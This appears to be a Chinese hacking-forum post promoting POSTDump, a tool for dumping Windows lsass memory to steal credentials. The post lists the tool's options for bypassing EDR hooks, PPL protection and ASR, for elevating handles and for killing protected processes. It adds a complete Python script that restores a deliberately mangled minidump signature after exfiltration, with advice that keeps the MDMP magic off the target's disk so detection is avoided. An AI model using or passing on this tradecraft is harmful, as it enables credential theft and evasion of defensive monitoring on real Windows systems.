YOLOP0wn · Hack分享吧 · 2023-09-26 08:30, posted from Hunan
Tool overview: POSTDump is a C#/.NET implementation of the ReactOS minidump routines (in the same spirit as nanodump), so it writes the dump itself instead of calling the Windows API MiniDumpWriteDump. It combines several techniques to get past EDR userland hooks and PPL (Protected Process Light) protection when dumping lsass memory.
As with NanoDump, the minidump can be encrypted in memory or written with an invalid signature so the file on disk is not recognised as a dump; it also supports using the Process Explorer (ProcExp) driver to open a handle to, dump, or kill protected processes.
Tool parameters:

c:\Temp>PostDump.exe --help

  -o, --output          Output filename [default: Machine_datetime.dmp] (fullpath handled)
  -e, --encrypt         Encrypt dump in-memory
  -s, --signature       Generate invalid Minidump signature
  --snap                Use snapshot technic
  --fork                Use fork technic [default]
  --elevate-handle      Open a handle to LSASS with low privileges and duplicate it to gain higher privileges
  --duplicate-elevate   Look for existing lsass handle to duplicate and elevate
  --asr                 Attempt LSASS dump using ASR bypass (win10/11/2019) (no signature/no encrypt)
  --driver              Use Process Explorer driver to open lsass handle (bypass PPL) and dump lsass
  --kill [processID]    Use Process Explorer driver to kill process and exit
  --help                Display this help screen.
  --version             Display version information.
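A dump written with -s/--signature will not open in the usual parsers (mimikatz, pypykatz) until the MINIDUMP_HEADER magic is put back. The script below is an added example, not POSTDump's own code (check the project repository for any restore script it ships). It assumes the option mangles only the leading Signature and Version fields of the header, as nanodump's equivalent option does, and leaves the rest of the file untouched; the sample dump it builds is constructed here for the demonstration. It also refuses to "restore" a file whose stream directory does not fit in the file, which is what an --encrypt dump looks like before decryption.

```python
"""Check and restore the MINIDUMP_HEADER signature of an lsass dump.

Added example; not code from POSTDump. Assumes the --signature option
corrupts only the leading Signature/Version fields (as nanodump does)
and that the rest of the file is intact, so rewriting those fields
makes the dump parseable again.
"""
import struct
import sys

MINIDUMP_SIGNATURE = b"MDMP"   # 0x504D444D as a little-endian DWORD
MINIDUMP_VERSION = 0xA793      # low WORD of MINIDUMP_HEADER.Version
# MINIDUMP_HEADER: Signature, Version (low WORD), ImplementationVersion
# (high WORD), NumberOfStreams, StreamDirectoryRva, CheckSum,
# TimeDateStamp, Flags (ULONG64)
HEADER_FMT = "<4sHHIIIIQ"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 32 bytes
DIRECTORY_FMT = "<III"                      # MINIDUMP_DIRECTORY: StreamType, DataSize, Rva


def parse_header(data: bytes) -> dict:
    """Unpack the 32-byte header; raises ValueError if the blob is too short."""
    if len(data) < HEADER_LEN:
        raise ValueError("file shorter than MINIDUMP_HEADER")
    fields = struct.unpack_from(HEADER_FMT, data, 0)
    names = ("Signature", "Version", "ImplementationVersion", "NumberOfStreams",
             "StreamDirectoryRva", "CheckSum", "TimeDateStamp", "Flags")
    return dict(zip(names, fields))


def signature_is_valid(data: bytes) -> bool:
    """True only if both the magic and the version word are what parsers expect."""
    try:
        h = parse_header(data)
    except ValueError:
        return False
    return h["Signature"] == MINIDUMP_SIGNATURE and h["Version"] == MINIDUMP_VERSION


def directory_is_plausible(data: bytes) -> bool:
    """Sanity check that the stream directory lies inside the file.

    Guards against rewriting a file that is not a mangled minidump at all,
    e.g. an --encrypt dump, which has to be decrypted before this step.
    """
    h = parse_header(data)
    end = h["StreamDirectoryRva"] + h["NumberOfStreams"] * struct.calcsize(DIRECTORY_FMT)
    return (h["NumberOfStreams"] > 0
            and HEADER_LEN <= h["StreamDirectoryRva"]
            and end <= len(data))


def restore_signature(data: bytes) -> bytes:
    """Return a copy of the dump with Signature/Version rewritten to MDMP/0xA793."""
    if not directory_is_plausible(data):
        raise ValueError("stream directory out of range: not a mangled minidump")
    fixed = struct.pack("<4sH", MINIDUMP_SIGNATURE, MINIDUMP_VERSION)
    return fixed + data[len(fixed):]   # ImplementationVersion and the rest stay as-is


def build_sample_dump(invalidate: bool) -> bytes:
    """Constructed minimal dump: header, one directory entry, 8 bytes of stream data."""
    stream_data = b"\x00" * 8
    directory_rva = HEADER_LEN
    data_rva = directory_rva + struct.calcsize(DIRECTORY_FMT)
    header = struct.pack(HEADER_FMT, MINIDUMP_SIGNATURE, MINIDUMP_VERSION, 0,
                         1, directory_rva, 0, 0, 0)
    directory = struct.pack(DIRECTORY_FMT, 0, len(stream_data), data_rva)  # UnusedStream
    dump = header + directory + stream_data
    if invalidate:
        # Constructed mangling for the example: zero Signature and Version.
        dump = b"\x00" * 6 + dump[6:]
    return dump


if __name__ == "__main__":
    # usage: python restore_sig.py dump1.dmp [dump2.dmp ...]
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            blob = f.read()
        if signature_is_valid(blob):
            print(f"{path}: signature already valid")
            continue
        with open(path + ".restored", "wb") as f:
            f.write(restore_signature(blob))
        print(f"{path}: signature restored -> {path}.restored")
```

Run it on the dump after exfiltration, not on the target host, so the file that touches the target's disk never carries the MDMP magic. The directory check is deliberately conservative: if it fails, the file is either encrypted, truncated, or mangled more deeply than the Signature/Version fields, and blindly writing MDMP over it would only produce a corrupt dump.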
Download:
https://github.com/YOLOP0wn/POSTDump